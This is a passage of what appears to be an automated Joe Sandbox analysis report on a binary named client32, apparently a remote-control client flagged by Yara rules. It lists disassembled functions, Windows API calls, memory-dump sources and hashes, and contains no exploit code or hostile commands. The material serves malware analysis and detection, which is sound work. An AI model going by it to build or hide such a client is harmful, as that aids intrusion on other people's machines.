                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                                                                                                    • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                                                                                    • API String ID: 468487828-934300333
                                                                                                                                                                                                    • Opcode ID: ecf5237d3c1ec1f70e787f245b5d29412aff373a2d4b3b6da9ac5f410c095a34
                                                                                                                                                                                                    • Instruction ID: 2e6e1d300c4266612bf4869b02bb9134ae399a8ea59526bbeac45393f23ca2b2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ecf5237d3c1ec1f70e787f245b5d29412aff373a2d4b3b6da9ac5f410c095a34
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5FF0553EF4026A63C61362263C49F8FB6688BC1AA8F120071FA10BE684FD20B00041FB
                                                                                                                                                                                                    Function 11031440 Relevance: 9.2, APIs: 6, Instructions: 156fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C4A0: _memset.LIBCMT ref: 1110C4D2
                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 11031494
                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 110314B0
                                                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 110314D3
                                                                                                                                                                                                    • _memmove.LIBCMT ref: 11031527
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 11031563
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 110315C4
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$CloseHandle$CreateReadSize_memmove_memset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 845363514-0
                                                                                                                                                                                                    • Opcode ID: 6b6e9c007c11d9572d404fd9f833afc8f42ac5761e6d632b59b5e145f15c21bf
                                                                                                                                                                                                    • Instruction ID: f3b86de38a560134af6e2d620d743e83d5971917c983db1a0387e640a4d59ee1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b6e9c007c11d9572d404fd9f833afc8f42ac5761e6d632b59b5e145f15c21bf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E9514FB1E01219AFCB50CFA8D985A9EFBF9FF48318F108529E515E7240E731A901CB51
                                                                                                                                                                                                    Function 687EA80F Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __freebuf.LIBCMT ref: 687EA833
                                                                                                                                                                                                      • Part of subcall function 687EA7DE: free.MSVCR100(?,?,?,687EA838,?,?), ref: 687EA7F5
                                                                                                                                                                                                    • _fileno.MSVCR100(?,?,?), ref: 687EA839
                                                                                                                                                                                                    • _close.MSVCR100(00000000,?,?,?), ref: 687EA83F
                                                                                                                                                                                                    • _errno.MSVCR100 ref: 68808B94
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100 ref: 68808B9F
                                                                                                                                                                                                      • Part of subcall function 687EA595: _fileno.MSVCR100(?,?,?,?,?,?,?,687EA830,?), ref: 687EA5C4
                                                                                                                                                                                                      • Part of subcall function 687EA595: _write.MSVCR100(00000000,?,?,?,?,?,?,687EA830,?), ref: 687EA5CB
                                                                                                                                                                                                    • free.MSVCR100(?), ref: 68808BB4
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _filenofree$__freebuf_close_errno_invalid_parameter_noinfo_write
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1941134952-0
                                                                                                                                                                                                    • Opcode ID: 4d11a22a5687fa657dc88992964cc0f3a3af2764d99355c45d40b5b2b8714fdb
                                                                                                                                                                                                    • Instruction ID: 13165f964871cb559ee434faa72c00f7c12e1f3cb4042744688c25c3f9545c1d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d11a22a5687fa657dc88992964cc0f3a3af2764d99355c45d40b5b2b8714fdb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14F04476901A045AD311163E8E8CB2AB3F85FA2339F844A24F938A74C0EB34C00206B0
                                                                                                                                                                                                    Function 68822983 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR100(00000000,?,00000000,?,?,?,?,?,?,?,?,6881D091,?,00000000,?,00000000), ref: 688229B1
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR100(00000000,?,00000000,?,?,?,?,?,?,?,?,6881D091,?,00000000,?,00000000), ref: 68822A33
                                                                                                                                                                                                    • ??_V@YAXPAX@Z.MSVCR100(?,?,?,00000000,?,?,?,?,?,?,?,?,6881D091,?,00000000,?), ref: 68822B61
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: ,$,
                                                                                                                                                                                                    • API String ID: 0-220654547
                                                                                                                                                                                                    • Opcode ID: 80d76ad7a11ea31467d63abe963eeb7d8ebfcca97ad68425637ad4bd0bebaacb
                                                                                                                                                                                                    • Instruction ID: 6e2e0b9714a1430749505ea8ed77b31afdcc409bbe6cdbdb591ac6ae68d1c837
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 80d76ad7a11ea31467d63abe963eeb7d8ebfcca97ad68425637ad4bd0bebaacb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82516B71910709DFCB28DF68C5A0BAEFBB1FF09310F90896ED466A7640D334A981CB91
                                                                                                                                                                                                    Function 11033470 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 125windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SendMessageA.USER32(?,00000146,00000000,00000000), ref: 110334C3
                                                                                                                                                                                                    • SendMessageA.USER32(?,00000149,00000000,00000000), ref: 110334E9
                                                                                                                                                                                                    • SendMessageA.USER32(?,00000148,00000000,?), ref: 1103350D
                                                                                                                                                                                                    • _strncmp.LIBCMT ref: 11033572
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&')(.-_{}~., xrefs: 110334A5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MessageSend$_strncmp
                                                                                                                                                                                                    • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&')(.-_{}~.
                                                                                                                                                                                                    • API String ID: 3653864897-2723064302
                                                                                                                                                                                                    • Opcode ID: bd44523ccd12641375facf51592b89295bfeb8cb24e0a09ba3e6b882b1ec2f72
                                                                                                                                                                                                    • Instruction ID: bc9ce7f87aeaad0c1939b1cc53b23d9fe1575812c47fb94f3614b61ec272b28a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd44523ccd12641375facf51592b89295bfeb8cb24e0a09ba3e6b882b1ec2f72
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19410632E1425A5FD712CE748CC0BAAB7E99F81316F1446E5E919DF3D0EA31DA488B40
                                                                                                                                                                                                    Function 110331B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _strncpy$wsprintf
                                                                                                                                                                                                    • String ID: %s (%s)
                                                                                                                                                                                                    • API String ID: 2895084632-1363028141
                                                                                                                                                                                                    • Opcode ID: 41cf12a399e40223a309384de66e6f5f00fee422c91aa36a5002e1312780ba24
                                                                                                                                                                                                    • Instruction ID: 6d4a293539ff99ff9d91cd4089b7baa119477a06ea1ce5901e9509b66a7a6bff
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41cf12a399e40223a309384de66e6f5f00fee422c91aa36a5002e1312780ba24
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4731F374E143469FEB11CF24DCC4BA7BBE8AF85309F004968E9458B382E7B4E514CBA1
                                                                                                                                                                                                    Function 110EB160 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101registryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000,00000000,75C04C70), ref: 110EB1B1
                                                                                                                                                                                                    • _free.LIBCMT ref: 110EB1CC
                                                                                                                                                                                                      • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
                                                                                                                                                                                                      • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(000007FF,?,00000000,?,00000000,000007FF), ref: 110EB20A
                                                                                                                                                                                                    • _free.LIBCMT ref: 110EB293
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: QueryValue_free$ErrorFreeHeapLast
                                                                                                                                                                                                    • String ID: Error %d getting %s
                                                                                                                                                                                                    • API String ID: 3888477750-2709163689
                                                                                                                                                                                                    • Opcode ID: 92455008d62525dafcdf8e23666724c203daf775c03ee8a075b6d364e35e82c3
                                                                                                                                                                                                    • Instruction ID: 4c35e499aaf5ad9a009ae928ade364ef1dd2f983720d507f3f6301ea2f5437f7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92455008d62525dafcdf8e23666724c203daf775c03ee8a075b6d364e35e82c3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA316175D001299FDB90DA55CC84BAEB7F9AF45304F05C0E9E959A7240DE306E85CFE1
                                                                                                                                                                                                    Function 1113F370 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProfileStringA.KERNEL32(Windows,Device,,,LPT1:,?,00000080), ref: 1113F39E
                                                                                                                                                                                                    • _memmove.LIBCMT ref: 1113F3ED
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ProfileString_memmove
                                                                                                                                                                                                    • String ID: ,,LPT1:$Device$Windows
                                                                                                                                                                                                    • API String ID: 1665476579-2967085602
                                                                                                                                                                                                    • Opcode ID: 545c589ca3c1c67feaf2385bf7ba58e2cdbbd1510027cf68d9306f3142d9ecb6
                                                                                                                                                                                                    • Instruction ID: bcd620f34367886d122ba7e5b4bc1f5e42e64e22dfa310253f00a50472163b57
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 545c589ca3c1c67feaf2385bf7ba58e2cdbbd1510027cf68d9306f3142d9ecb6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42112965A0425B9AEB108F24AD45BBAF768EF8520DF0040A8ED859714AEA316609C7B3
                                                                                                                                                                                                    Function 11141070 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 1114107C
                                                                                                                                                                                                    • _memset.LIBCMT ref: 11141098
                                                                                                                                                                                                    • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 111410B6
                                                                                                                                                                                                    • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 111410DF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ItemMenu$Info$Count_memset
                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                    • API String ID: 162323998-4108050209
                                                                                                                                                                                                    • Opcode ID: 0c1e1fdabff6bfde52f05e2d3fca83c1d12d76b79eb12fdf68bc459e20492bd0
                                                                                                                                                                                                    • Instruction ID: 2bcd32ba99f467236d3458310ced708016d2ad859b25bc85d693658704d9c718
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c1e1fdabff6bfde52f05e2d3fca83c1d12d76b79eb12fdf68bc459e20492bd0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0016171A11219BBDB10DF95DD89FDEFBBCEB45758F108115F914E3140D7B0660487A1
                                                                                                                                                                                                    Function 11141100 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadStringA.USER32(00000000,?,00000058,24DE4E77), ref: 11141118
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1114112E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
